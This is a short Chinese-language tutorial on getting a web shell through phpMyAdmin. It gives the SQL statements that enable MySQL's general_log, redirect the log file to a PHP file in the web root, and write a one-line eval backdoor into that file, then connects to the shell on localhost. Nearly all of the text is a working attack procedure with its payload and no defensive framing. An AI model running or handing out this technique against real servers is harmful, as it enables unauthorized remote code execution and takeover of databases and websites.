通过 phpmyadmin getshell
general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句
可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell
进入phpmyadmin后在SQL处执行SQL语句
首先查看general log是否开启
show variables like 'general_log';
general log是关闭状态,执行SQL语句开启general log
SET GLOBAL general_log = ON
开启成功
然后把general_log_file设置为shell的绝对路径
SET global general_log_file='D:/wamp/www/orange.php';
看下刚刚创建的orange.php里的内容
然后执行SQL查询语句,写个一句话进去。
SELECT '<?php @eval($_POST["orange"]);?>';
现在再看下orange.php里面的内容
成功插入了一句话木马
一句话链接在根目录(http://127.0.0.1/orange.php)
至此结束!
任重而道远!